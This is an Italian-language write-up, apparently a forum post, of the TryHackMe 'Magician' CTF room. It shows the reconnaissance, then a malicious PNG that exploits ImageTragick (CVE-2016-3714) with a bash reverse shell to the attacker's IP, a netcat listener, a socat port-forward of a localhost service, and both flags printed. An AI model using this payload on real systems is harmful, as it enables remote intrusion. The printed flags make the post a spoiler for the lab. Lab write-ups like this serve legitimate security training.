Descrizione:

This magical website lets you convert image file formats

User flag:

Per prima cosa aggiungiamo il nome host al nostro file:
echo "10.10.100.95 magician" | sudo tee -a /etc/hosts

In seguito lanciamo una sorta di sniffing con nmap:

PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 2.0.8 or later
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Fri, 30 Apr 2021 09:52:06 GMT
|     Connection: close
|     {"timestamp":"2021-04-30T09:52:07.398+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Fri, 30 Apr 2021 09:52:06 GMT
|     Connection: close
|     {"timestamp":"2021-04-30T09:52:06.969+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Fri, 30 Apr 2021 09:52:06 GMT
|     Connection: close
|     {"timestamp":"2021-04-30T09:52:07.099+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 465
|     Date: Fri, 30 Apr 2021 09:52:06 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 
|_    HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open  http       nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician

Come si può notare ci sono 3 porte aperte.

Proviamo a collegarci tramite FTP:

parrot@parrot:/data/vpn$ ftp magician 
Connected to magician.
220 THE MAGIC DOOR
Name (magician:kali): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> ls -la
550 Permission denied.
ftp: bind: Address already in use
ftp> cd /
550 Permission denied.
ftp> 

Come immaginavo collegandosi alla porta la macchina ci da un suggerimento.

Entrando nel sito fornito dal suggerimento si apre un convertitore di immagini da PNG a JPG.
Nel suggerimento si parla anche di vulnerabilità in particolare CVE-2016–3714, quindi non ci resta altro che caricare un PNG infettato.

parrot@parrot:/data/magician/files$ cat > image.png << EOF
> push graphic-context
> encoding "UTF-8"
> viewbox 0 0 1 1
> affine 1 0 0 1 0 0
> push graphic-context
> image Over 0,0 1,1 '|/bin/bash -i > /dev/tcp/10.8.50.72/4444 0<&1 2>&1'
> pop graphic-context
> pop graphic-context
> EOF

Tramite reverse shell mettiamo un terminale in ascolto:

parrot@parrot:/data/magician/files$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.100.95] 60864
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
magician@magician:/tmp/hsperfdata_magician$ id
id
uid=1000(magician) gid=1000(magician) groups=1000(magician)

Ecco la flag!

magician@magician:/tmp/hsperfdata_magician$ cd /home
cd /home
magician@magician:/home$ ll
ll
total 12
drwxr-xr-x  3 root     root     4096 Jan 30 10:43 ./
drwxr-xr-x 24 root     root     4096 Jan 30 10:31 ../
drwxr-xr-x  5 magician magician 4096 Feb 13 07:19 magician/
magician@magician:/home$ cd magician
cd magician
magician@magician:~$ ls -la
ls -la
total 17204
drwxr-xr-x 5 magician magician     4096 Feb 13 07:19 .
drwxr-xr-x 3 root     root         4096 Jan 30 10:43 ..
lrwxrwxrwx 1 magician magician        9 Feb  6 13:38 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 magician magician     3771 Apr  4  2018 .bashrc
drwx------ 2 magician magician     4096 Jan 30 10:43 .cache
drwx------ 3 magician magician     4096 Jan 30 10:43 .gnupg
-rw-r--r-- 1 magician magician      807 Apr  4  2018 .profile
-rw-r--r-- 1 magician magician        0 Jan 30 10:43 .sudo_as_admin_successful
-rw------- 1 magician magician     7546 Jan 31 03:50 .viminfo
-rw-r--r-- 1 root     root     17565546 Jan 30 11:55 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician      170 Feb 13 07:19 the_magic_continues
drwxr-xr-x 2 root     root         4096 Feb  5 05:14 uploads
-rw-r--r-- 1 magician magician       24 Jan 30 11:30 user.txt
magician@magician:~$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}

Root flag:

Nella home della VM ho notato un ulteriore suggerimento "/home/magician/":
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.

Seguendo questa frase bisogna controllare le connessioni tramite netstat, pura casualità, la porta 6666 ha una strana connessione.

magician@magician:/tmp/hsperfdata_magician/uploads$ netstat -putan
netstat -putan
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:8081            0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0    300 10.10.100.95:60902      10.8.50.72:4444         ESTABLISHED 27129/bash          
tcp6       0      0 :::8080                 :::*                    LISTEN      957/java            
tcp6       0      0 :::21                   :::*                    LISTEN      -                   
tcp6       0      0 10.10.100.95:8080       10.8.50.72:35182        ESTABLISHED 957/java            
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.100.95:68         0.0.0.0:*   

C'è un problema, questo è disponibile solo per localhost quindi bisogna inoltrare tutto all'esterno esempio porta 7777.
Con socat quindi colleghiamoci a questa porta:

magician@magician:~$ wget http://10.8.50.72:8000/socat
magician@magician:~$ chmod +x socat
magician@magician:~$ ./socat tcp-listen:7777,reuseaddr,fork tcp:localhost:6666

Entrando tramite browser apparirà una specie barra di ricerca con sotto una stringa con codifica base64 (dovrebbe essere la root flag) quindi decodifichiamolo!

parrot@parrot:/data/src$ echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d
THM{magic_may_make_many_men_mad}

Conclusioni:

Room abbastanza easy ma che ci fa comunque ragionare soprattutto sulla ricerca di vulnerabilità e usabilità del terminale Linux.
Ricapitolando FTP, Web (8080), User flag e il discorso del cambio porta per la root flag!

Powered by: FreeFlarum.
(remove this footer)